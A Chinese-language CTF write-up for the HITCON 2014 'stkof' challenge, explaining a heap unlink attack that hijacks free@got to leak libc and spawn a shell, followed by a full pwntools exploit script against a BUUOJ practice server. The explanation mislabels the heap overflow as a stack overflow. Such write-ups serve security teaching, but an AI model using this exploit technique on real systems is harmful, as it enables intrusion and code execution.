hitcon2014_stkof
首先惯例先chekcsec一下 开启了nx和canary的64为程序 放进ida64里看看
当输入1时添加堆 输入2时编辑堆 输入3时释放堆
1 添加堆
在bss段的dword上存储申请到的chunk的地址
2 编辑堆
注意 此处的编辑堆 由于长度时有我们自己控制的所以此处存在栈溢出漏洞。
3释放堆
标准的释放堆的过程不存在uaf漏洞
4没啥用 这里就粗放出来了
edit函数存在栈溢出漏洞因此我们次吃可以利用unlink的操作来帮助我们获取flag
首先我们先add3个chunk并利用gdb找出他们存储的位置以及chunk地址在bss段上的地址
然后我们利用栈溢出漏洞修改chunk2的内容并在其中构造一个已经被free掉的fakechunk
具体操作流程:先构造fakechunk并将其fd指向ptr-0x18 bk指向ptr-0x10 然后将chunk3的prevsize篡改为0x20(即可用空间0x10) size篡改为0x90
然后free掉chunk3实现unlink操作
从而实现令bss段上原本存储chunk2地址的位置存储了该地址-0x18的地址达到我们编辑chunk2上的内容实际是修改bss段上的内容实现进而将chunk1的地址篡改为free.got以及chunk3的地址篡改为puts.got然后编辑chunk1的内容(即编辑free.got的内容将其改为puts.plt)达到将free函数篡改为puts函数的功能
delete(3)获得puts_addr进而得到libc
然后同理将free函数改为system函数
然后将bss段上存储chunk3的地址的位置改为ptr+0x10再在该处填上“/bin/sh”然后delete(3)(实际上是执行system(bin\sh))
exp:
from pwn import *
from LibcSearcher import *
gdb.attach
#io=process('./stkof')
io=remote('node4.buuoj.cn',25605)
elf=ELF('./stkof')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
free=elf.got['free']
def add(size):
io.sendline('1')
io.sendline(str(size))
io.recvuntil('OK\n')
def edit(idx,size,content):
io.sendline('2')
io.sendline(str(idx))
io.sendline(str(size))
io.send(content)
io.recvuntil('OK\n')
def delete(idx):
io.sendline('3')
io.sendline(str(idx))
add(0x100)
add(0x20)
add(0x80)
ptr=0x602150
payload=p64(0)+p64(0x21)+p64(ptr-0x18)+p64(ptr-0x10)+p64(0x20)+p64(0x90)
edit(2,len(payload),payload)
delete(3)
io.recvuntil('OK')
payload=p64(0)+p64(0)+p64(free)+p64(ptr-0x18)+p64(puts_got)
edit(2,len(payload),payload)
edit(1,8,p64(puts_plt))
delete(3)
puts_addr=u64(io.recv(6).ljust(8,'\x00'))
print(hex(puts_addr))
libc=LibcSearcher('puts',puts_addr)
base=puts_addr-libc.dump('puts')
io.recvuntil('OK')
system_addr=base+libc.dump('system')
payload=p64(0)+p64(0)+p64(free)+p64(ptr-0x18)+p64(ptr+0x10)+"/bin/sh"
edit(2,len(payload),payload)
edit(1,8,p64(system_addr))
delete(3)
io.interactive()